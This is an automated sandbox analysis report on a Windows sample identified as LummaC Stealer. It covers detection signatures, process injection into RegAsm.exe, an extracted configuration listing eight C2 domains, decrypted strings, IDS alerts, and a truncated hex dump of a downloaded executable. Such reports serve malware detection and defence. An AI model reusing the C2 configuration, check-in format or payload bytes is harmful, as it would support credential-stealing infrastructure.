Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
htZgRRla8S.exe

Overview

General Information

Sample name:htZgRRla8S.exe
renamed because original name is a hash value
Original sample name:b1becdbff2a34334ae4ff5f387115ec3.exe
Analysis ID:1574065
MD5:b1becdbff2a34334ae4ff5f387115ec3
SHA1:492305491185a6114ef915ff3b5f705c5facd086
SHA256:c89c8a2ec7d0da083703bd095ba75a8656ae9fd1ffa08b26c8e43d6d04e468c9
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • htZgRRla8S.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\htZgRRla8S.exe" MD5: B1BECDBFF2A34334AE4FF5F387115EC3)
    • csc.exe (PID: 5996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 5596 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["formy-spill.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "impend-differ.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "DUkgLv--otdel"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: htZgRRla8S.exe PID: 4144JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\htZgRRla8S.exe", ParentImage: C:\Users\user\Desktop\htZgRRla8S.exe, ParentProcessId: 4144, ParentProcessName: htZgRRla8S.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", ProcessId: 5996, ProcessName: csc.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\htZgRRla8S.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\htZgRRla8S.exe", ParentImage: C:\Users\user\Desktop\htZgRRla8S.exe, ParentProcessId: 4144, ParentProcessName: htZgRRla8S.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", ProcessId: 5996, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:09.569495+010020283713Unknown Traffic192.168.2.549705172.67.206.64443TCP
        2024-12-12T21:32:10.939727+010020283713Unknown Traffic192.168.2.549706172.67.206.64443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:10.590925+010020546531A Network Trojan was detected192.168.2.549705172.67.206.64443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:10.590925+010020498361A Network Trojan was detected192.168.2.549705172.67.206.64443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:09.569495+010020579741Domain Observed Used for C2 Detected192.168.2.549705172.67.206.64443TCP
        2024-12-12T21:32:10.939727+010020579741Domain Observed Used for C2 Detected192.168.2.549706172.67.206.64443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:05.359783+010020197142Potentially Bad Traffic192.168.2.549704147.45.44.13180TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:07.871319+010020579731Domain Observed Used for C2 Detected192.168.2.5591221.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:07.412962+010020579791Domain Observed Used for C2 Detected192.168.2.5590921.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:07.639261+010020579771Domain Observed Used for C2 Detected192.168.2.5534061.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:07.176360+010020579831Domain Observed Used for C2 Detected192.168.2.5599781.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:06.957951+010020579811Domain Observed Used for C2 Detected192.168.2.5568591.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-12T21:32:05.574589+010028000291Attempted User Privilege Gain147.45.44.13180192.168.2.549704TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: htZgRRla8S.exeAvira: detected
        Antivirus detection for URL or domain
        Source: zinc-sneark.bizURL Reputation: Label: malware
        Source: dwell-exclaim.bizURL Reputation: Label: malware
        Source: formy-spill.bizURL Reputation: Label: malware
        Source: https://covery-mover.biz/2Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/apiQAvira URL Cloud: Label: malware
        Source: https://covery-mover.biz/Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/apinAvira URL Cloud: Label: malware
        Source: https://covery-mover.biz/apiAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
        Found malware configuration
        Source: 5.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "impend-differ.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "DUkgLv--otdel"}
        Multi AV Scanner detection for submitted file
        Source: htZgRRla8S.exeReversingLabs: Detection: 55%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dllJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: htZgRRla8S.exeJoe Sandbox ML: detected
        Sample uses string decryption to hide its real strings
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: impend-differ.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: print-vexer.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dare-curbys.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: covery-mover.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: formy-spill.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: se-blurry.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DUkgLv--otdel
        Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: htZgRRla8S.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.pdb source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]5_2_0040A960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx5_2_00409CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], bl5_2_0040CE55
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_0042A060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]5_2_00425F7D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx5_2_0041D074
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx5_2_0041D087
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl5_2_0042D085
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl5_2_0042D085
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]5_2_00426170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]5_2_0041597D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]5_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax5_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax5_2_00405910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax5_2_00405910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h5_2_00425920
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_004286F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]5_2_00417190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_00422270
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h5_2_0040C274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00444284h]5_2_00425230
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]5_2_0043CAC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]5_2_004292D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebx5_2_004292D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]5_2_0042AAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl5_2_00415ADC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push eax5_2_0040C36E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, bx5_2_0042536C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]5_2_00402B70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx5_2_00427307
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]5_2_00436B20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h5_2_0043DBD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]5_2_0043CBD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]5_2_00407470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]5_2_00407470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_0042B475
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h5_2_00419C10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]5_2_0043CCE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh5_2_0043DCF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al5_2_0042B4BB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]5_2_0043CD60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_004345F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]5_2_00427653
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]5_2_0043CE00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h5_2_0042A630
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]5_2_0042C6D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al5_2_0042C6D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]5_2_0042C6D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]5_2_0042C6D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]5_2_004296D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]5_2_00415EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00421EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh5_2_004266E7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_004286F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx5_2_00417E82
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh5_2_0043E690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]5_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax5_2_00416E97
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h5_2_0041CEA5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 03h5_2_00428F5D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]5_2_00425F7D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h5_2_00414F08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edx5_2_00414F08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00420717
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx5_2_00420717
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]5_2_0042BFD3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]5_2_0042BFDA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h5_2_0043DFB0

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:53406 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:53406 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:59122 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:59122 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:56859 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:56859 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:59978 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:59978 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.5:49704
        Source: Network trafficSuricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:59092 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:59092 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.64:443
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: formy-spill.biz
        Source: Malware configuration extractorURLs: covery-mover.biz
        Source: Malware configuration extractorURLs: se-blurry.biz
        Source: Malware configuration extractorURLs: zinc-sneark.biz
        Source: Malware configuration extractorURLs: dwell-exclaim.biz
        Source: Malware configuration extractorURLs: impend-differ.biz
        Source: Malware configuration extractorURLs: dare-curbys.biz
        Source: Malware configuration extractorURLs: print-vexer.biz
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 20:32:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:22:16 GMTETag: "48e00-628ee8f9c1375"Accept-Ranges: bytesContent-Length: 298496Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 